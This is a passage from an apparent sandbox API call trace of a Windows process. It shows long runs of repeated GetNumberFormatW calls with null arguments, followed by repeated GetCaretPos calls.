(in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.909] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.910] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0045.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.814] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.815] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.816] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.817] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 